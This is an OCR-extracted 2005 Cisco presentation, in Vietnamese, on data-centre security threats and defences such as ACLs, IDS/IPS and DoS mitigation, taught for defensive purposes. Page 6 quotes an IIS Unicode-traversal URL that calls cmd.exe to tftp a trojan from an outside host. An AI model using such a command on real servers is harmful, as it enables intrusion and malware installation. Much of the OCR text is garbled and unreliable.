Cisco đã sẵn sàng với trung tâm dữ liệu Network Topology và cách thức hướng tới trung tâm dữ liệu DC..... Các nguy cơ an ninh trung tâm dữ liệu Các nguy cơ can thiệp trái phé.. Các kỹ
Trang 1GIAM ĐÓC GIẢI PHÁP DOANH NGHIỆP
CISCO CHAU A THAI BINH DUONG
CCIE #3119
© 2005 Cisco Systems, Inc All rights reserved 1
Trang 2
Lịch trinh
„ Các nguy cơ vệ an ninh đối với trung tâm dữ liệu
¢ Ky thuật an ninh trung tâm dữ liệu
- Thiết kế trung tâm dữ liệu
© 2005 Cisco Systems, Inc All rights reserved 2
Trang 3Cisco đã sẵn sàng với trung tâm dữ liệu
Network Topology và cách thức hướng tới trung tâm dữ liệu DC
Trang 4Các nguy cơ an ninh trung
tâm dữ liệu
© 2005 Cisco Systems, Inc All rights reserved 4
Trang 5Các nguy cơ an ninh trung tâm dữ liệu
Các nguy cơ can thiệp
trái phé
Các nguy cơ từ chối dịch vụ
Webiapplication Database
= Flooded Ppe Yictim
dge route (web server)
Các nguy cơ về sâu
© 2005 Cisco Systems, Inc All rights reserved 5
Trang 6Trình tự can thiệp trái phép điễn hình
Phase 1: Hacking vao Server cua Web và ứng dụng
- Sau bước probing/scanning, kê xâm nhập (hacker) phát hiện điểm
yêu của server web/ứng dụng
- _ Hacker khai thác điểm yếu đề lây shell
° Vị dụ:
copy virus trojan vào server web/ứng dụng:
HTTPS:/Iwww.example.comiscripts/ %c0%af Iwinntfsystem32iEmd.exeP Ic+tftp%20-1%2010.20.15.15%20GET%20trojan.exe%20trojan.exe
© 2005 Cisco Systems, Inc All rights reserved
Trang 7Trình tự can thiệp trái phép điện hìn
Phase 2 — Các chiên lược
S2 ord and SN sa,
Credit Card Information Eã
Normal traffic
path Traffic path in presence
Of ARP poisoning 192.168.10.0/24
Trang 8CÁC NGUY CƠ TỪ CHÓI DỊCH VỤ
© 2005 Cisco Systems, Inc All rights reserved 8
Trang 9Các mục tiêu tân công DoS
Duong lién két mang
- _ Có thê được kết hợp với:
Nhái lại địa chỉ nguồn IP
- _ Các hiểm nguy đi cùng bao
Trang 10Các tân công DoS thông thường
I wilinot shut down major e-commerce sites
- Tính dé tốn thương của giao thức
I willnot shut down major e-commerce sites
I willnot shut awe @®-Commerce sies
- Các đầu nồi đã được thiết lập
TCP Connects HTTP Gets
Copyright 2000, The Halitex Herald Limited
Trang 11: Stacheldraht
added automatic updates with RCP Randomization of TCP flags, addresses, attacks, port 53 source Bundled into 2001 Ramen worm
+ Shaft Tickets used to track agents Statistics to calculate the yield of the DoS network
- Mstream, Trinity, Knight, Kaiten, Agobot, Phatbot
asters Điêu khiển lưu lượng
Lưu lượng tấn công =>
Trang 12¢ Used for DDOS, SPAM, network mapping, password sniffing,
identity / info theft, pay per click ad abuse, malware proliferation, etc
-_ Kế cả chỉ với 1000 máy botnet có thê chiêm hữu hâu hết
đường truyên Internet
128 kbps * 1000 > 100 mbps
The Honeynet Project and Research Alliance, March 13, 2005
© 2005 Cisco Systems, Inc All rights reserved 12
Trang 14CÁC NGUY CƠ - SÂU (WORMS)
© 2005 Cisco Systems, Inc All rights reserved 14
Trang 15Các sâu gân đây
“Sự tích hợp và tự động hóa cua tat ca
các khía cạnh can thiệp trái phép: quét do thám, xác định mục tiêu, thỏa hiệp, gắn và dieu khien tan cong ”
Dave Dittrich, 2004
© 2005 Cisco Systems, Inc All rights reserved 15
Trang 16Sâu lan truyền bằng cách nào?
Khai thác mạng và điểm yếu
Cửa số sau (Backdoors)
Từ khóa (mật khẩu) kém hoặc đề ở chế độ mà
Chia se file Windows
Các trang Web đen
E-mail Các kênh IRC
Instant Messaging
«
Peer-to-peer
° Newsgroups
- _ Tất cả hoặc bất kỳ trong những điều kế trên
© 2005 Cisco Systems, Inc All rights reserved 16
Trang 17Các ảnh hưởng của sâu
=m Ề Sẻ
- _ Tai nạn DoS
- DDoS được tự động Các máy chủ chuyên tiếp
CodeRed1, Blaster Sniffers (passwords, botnet theft)
Slapper, Phatbot liệu
- Backdoor servers yP g
Thay đổi nối dung trang Web
Qaz, CodeRed_lI, Nimda
Sửa chữa sâu
Trang 18
Lịch trinh
° Các nguy cơ an ninh trung tâm dữ liệu
¢ Ky thuật an ninh trung tâm dữ liệu
- Thiết kế an ninh cho trung tâm dữ liệu
© 2005 Cisco Systems, Inc All rights reserved 18
Trang 19Các kỹ thuật anh ninh trung tâm dữ liệu
Trang 21Bảo vệ trước những tân công xâm nhập trái phép
- Điều khiến truy nhập và phân
- Xét duyệt kỹ ARP và PVLANs ~ |
Encryption: Web Server |=|
Trang 22
, ®> c = = ên truy nhập và phân đoạn mạng
Salata Dừng tải về các công ; a
! cụ tấn công Hạn chê truy nhap den
các servers trình diễn tại
luật lệ về bức
tường lửa
Trang 23
FW Rule Type Rule Description
Exemption ICMP Echo Reply Outgoing Ping Commands Require Echo-reply Messages To Come Back
Exemption ICMP Time-Exceeded Outgoing Traceroute Commands Require Time-exceeded Messages to Come Back
Exemption ICMP Traceroute Allow an Incoming Traceroute
Exemption ICMP Unreachable Permit All "Unreachable" Messages to Come Back; If a Router Cannot Forward or Deliver
a Datagram, it Sends an ICMP Unreachable Message Back to the Source and Drops the Datagram
Exemption Network Management Protocols (SSH, SSL, Syslog, | These Protocols Should Have ACL Entries that Strictly Limit the Sources and
SNMP) Destinations for this Traffic Exclusion Denying Any Network Traffic from a Source This Is Known as IP Anti-Spoofing Protection Because it Prevents Traffic from an
Address Matching an Address on the Protected Unprotected Network From Assuming The Identity Of A Device on the Protected Network; Network Note that Unicast RPF Checks (Next Subsection) Can Be Used to Provide this
Functionality
Exclusion Denying Broadcast Messages with a Source This Entry Helps To Prevent Broadcast Attacks
Address of 255.255.255.255 Exclusion Denying Broadcast Messages with a Source This Entry Helps to Prevent Broadcast Attacks An Exemption May Be Required to
Address Of 0.0.0.0 Support DHCP Clients, if the Router Is Providing DHCP Services
Allowed Permitting Traffic to/from (Egress/Ingress) Hosts These Are Statements Which Define Traffic Which, when Matched, Should Be Forwarded
Connected to the Interface to which the ACL Is by the Interface; This of Course Varies Based on the Applications Supported Applied
Denied By Default, Access Lists Are Defined as ‘Deny Any This Denies All Other IP Traffic from Being Forwarded across the Interface
Any’
Trang 24
© 2005 Cisco Systems, Inc All rights reserved
- Bức tường lửa các ACL
Tòan trạng thái, có thê
quản lý
+ PT: Source Destination Rule Applied eae Sey Lo
Host(Network Host(Network To Traffic Inti
2 Vv iat Group:webservers 4 dns-server/ incoming inside ur domain/udp
10.20.20.7
Sel
4 @ @ any ®\ 11.20.5.255 incoming outside ich icmp
© @ @ any 8) 11.20.5.255 incoming outside re tcp
24
Trang 25Apply to Traffic: |incaming to sre interface | More Options |
~ Source HostiNetwork- : -Destination Host(Network —
@ IP Address f~ Name
© Group ( |P Address f~ Name Group
Interface: jinside xi Interface: jinside xi
Protocol and Service -
@TCP UDP © ICMP CIP -Source Port
Manage Service Groups |
Please enter the description below (optional):
2 ZUUO LISCO systems, Inc All rignts reserved 25
Trang 26Tại sao lại IDS?
Phát hiện bộ đệm tràn đối với các
dịch vụ dê bị tân công
Phát hiện sự hư hỏng ARP
Phát hiện sự đánh giá ứng dụng
CMD.EXE
Phát hiện hoạt động quét
Phát hiện các sự thăm dò tới
backdoors băng các sâu (worms)
Không bị nhiễu với lưu lượng mạng
Trang 27Các thách thức IDS
Nessus Setup a
een“
x
| Nessusd host | Plugins | Credentials | Scan Options | Target | User | Prefs | KB | Credits |
Target selection Target(s) :
# Type Sensor UTC Time Event ID Events SigID —
16 alertinformati 05 May 200517:14:13UTC | 1111498934529692497 Back Door Probe (TCP 9996) 9044
17 alertinformati 05 May 2005 17:14:13UTC | 1111498934529692498 Back Door Probe (TCP 10002) 9043
1B alertlow37 05May200517:1413UTC 1111498934529692499 Back Door Probe (TCP 10168) 9024
19 alertinformati 05 May 2005 17:14:14UTC | 1111498934529692600 Back Door Probe (TCP 12345) 9000
20 alertinformati 05 May 200517:14:16UTC | 1111498934529692501 Back Door Probe (TCP 16959) 9013
21 alertinformati 05 May 200517-1417UTC | 1111498934529692502 Back Door Probe (TCP 20034) 9005,
22 alertinformati 05 May 2005 17:14:17 UTC | 1111498934529692503 Back Door Probe (TCP 20168) 9025
23 alertinformati 05 May 200517-14.18UTC 1111498934529692604 Back Door Probe (TCP 23432) 9015:
24 alertlow:37 05May200517:14:18UTC 1111498934529692505 TCP Upper Port Sweep 3010
26 alertinformati 05 May 2005 17:14:20UTC 1111498934529692506 Back Door Probe (TCP 27374) 9006
2B alertinformati 05 May 2005 17:14:20UTC | 1111498934529692507 Back Door Probe (TCP 27573) 9014
27 alertinformati 05 May 2005 17:14:21 UTC | 1111498934529692508 Back Door Probe (TCP 31337) 9001
28 alertmedium: 05 May 2005 17:14:24UTC | 1111498934529692613 Back Door Probe (TCP 36794) 9023
29 alertlow:37 05 May 200817-14:29UTC | 1111498934529692518 TCP Upper Port Sweep 3010
30 alertlow42 05May200517:14:35UTC 1111498934529692519 TCP SYN Port Sweep 3002
© 2005 Cisco Systems, Inc All rights reserved
Trang 28Sự tương quan các sự kiện
Events and Sessions, last 0d-1h:00m
Chart resolution: 1Min Avg/Min
MM Received events, non-netflow
Sessions
: Hàng ngàn các sự kiện được
giảm tới con số có thể quản lý
| Hour xÌ | Large Chart | i
6:08PM All-Time Total 231,767 169,459
được với sự tương quan
© 2005 Cisco Systems, Inc All rights reserved
1:400531gf UDP Port Sweep EF
UDP Host Flaod|a],
Nmap UDP Port Sweep
HTTP header contains scripts[q]
I:400523Eđ7 Nmap UDP Port Sweep [a] I:400525E7 TCP SYN Port Sweepli
TCP High Fort Sweep|aÌ, UDP Port Sweep|a],
Nmap UDP Port Sweep
4
WWW Cisco IOS %%
DoS|[3Ì
28
Trang 29Phòng ngừa sự xâm nhập mạng trái phép
—mằ.ằềễ>>AMM xa
® Edit Sipnature
@ Alert Severity: |High vị
® Cisco IDM 5.0 - 172.28.214.14 BB Sig Fidelity Rating: fico 8Ft—“‘S™S™S
Configuration Monitoring Back Foryard Refresh Help | © Sig Description:
E Sensor Setup +! — Signature Configuration /
Network | ®@ Signature Name:
allowed Hosts Select By: [Sig Name vị Enter Sig Name: {IIS | Ni = IR
Er.85H @ Alert Notes: | 1906 'HTTE -
Q Certificates Sig ID | SubSig ID Name Enabled WH Userc ‘<
~WuUsers 5034 0 WAWYiIIS newdsn attack Yes Prod
| Alert Traits: |
+ Interface Configuratin 5048 O WVWIIS BAT EXE attack Yes — Prod a
-ÑÈInterfaces 5049 0 WAMVIIS showcode.aspacc Yes ProdI
@ Release: [S20 2
~PWinterface Pairs
-#Bypass 5050 0 | WWMVIIIS htr Overflow Attack Yes Prodi
~ GN Traffic Flow Notific 5051 0 | IIS Double Byte Code Page Yes Prod(© Engine: Service HTTP
EG Q Analysis Engine |
!-fWVinual Sensor 5051 | 2 | IS Double Byte Code Page | Yes | Prod @ Event Action: Deny Attacker Inline ^
Global Variables 5051 | 1 IIS Double Byte Code Page Yes Prodi Deny Connection Inline
EQ Signature Definition 5075 0 WWWIIS Virtualized UNC Bug) Yes Prodi Dữ Nger Nhi ng
“Ñ\Signature wana 5085 0 WWWIIS Source FragmentA Yes Prodi | on Pair Packets `
~®custom Signature PM VTA ERO ee cts Ey f 3ÿ"
~JMiscellaneous [ _
GQ Event Action Rules Produce Alert
~Wevent Variables 3114 Ú | WWMW I6 Unlcode Aliack ves Request Block Activate |
~Wrarget Value Ratin
` | Produce Alert Reti
2 Wevent Action OverrÍ 5114 1 VWWW IIS Unicode Aftack Yes Request Block etire |
~WeEvent Action Filters BI
=General Settings 5123 1 WMV IIS Internet Printing Ov Yes - SG
GQ Blocking aa | ,
~ Blocking Propertie Apply Reset |
4 >
Trang 30
Xác thực nào đề kích hoat IPS2
2 Gan cac hanh dong š | Deny Packet Inline 7 x| AlatkerPort _‘[0-65595
ENN OTN LNG Pay ae Victim Address: |0.0.0.0-255.255.255.255
P ˆ Jenv racKe :
® Add Event Action Override a
Og AIlACKer rackets — Victim Port: |0-85535
Log Attacker/Victim Pair Packets
EventAction: 18/2722400i- _y Log Victim Packets uf Risk Rating: Minimum Maximum
Produce Alert ¬1 jo : i00
Produce Verbose Alert LJ
Enabled: @ Yes f Na Request Block Connection Actions to Subtract |Deny Attacker Inline a
Request Block Host vw Deny Connection Inline
Log Attacker Packets =
Risk Rating: Minimum Maximum Log Victim Packets
Trang 31
Phòng ngừa sự xâm nhập trái phép vào máy chủ
Host
Hệ thống an ninh của Cisco
chặn các cuộc goi OS áp dụng
và đưa ra đáp ứng cho phép(từử
chối =¬ manapeor | Tae - |
Các bộ chặn giám sát cuộc gọi | ^ | ° +
Thực thi (tạo tiến trình, truy nhập > {ert ae
thu vién, executable invocation)
Kién truc“Zero Update” là hành
vi dựa trên sự điêu khiên dé ban real-fime
x ng pe ak decision không cânmột xác thực mới đề
dừng cuộc tân công tiếp theo
© 2005 Cisco Systems, Inc All rights reserved 31
Trang 32
Tóm tắt sự bảo vệ trước các tần công xâm nhập
Các bản kê truy nhập (Access-Lists)
Giảm thiểu các tân công tiềm năng,
ngừng tải vê công cụ đề tạo thời cơ cho các tân công
IDS va IPS
Phát hiện và phòng ngừa các tân công
tại lớp ứng dụng
Quản lý và tương qua các sự kiện
Kiém tra ky ARP va PVLANs
Phong ngtra MITM trong cung mién lớp
Trang 33
° Các nguy cơ an ninh trung tâm dữ liệu
¢ Ky thuật an ninh trung tâm dữ liệu
Phát hiện, phòng ngừa xâm nhập trái phép
Phát hiện và giảm thiểu từ chối dịch vụ
Phát hiện và giảm thiểu sâu
- Thiết kế trung tâm dữ liệu
Phân đoạn các máy tính (Serverfarm)
Các kỹ thuật bắt giữ và phát hiện xâm nhập
© 2005 Cisco Systems, Inc All rights reserved 33
Trang 34PHAT HiEN VA GiAM THIEU TU CHOI
DICH VU
Trang 35Các công cụ giảm thiêu DoS
° Phát hiện DoS
© Cac ACL
- Chỗng đánh lừa (Anti-spoofing)
- Giảm thiêu tần công SYN
° Các công cụ QoS như CAR và chính sách lưu lượng
° BGP triggers
¢ Lam sach goi (Packet scrubbing)
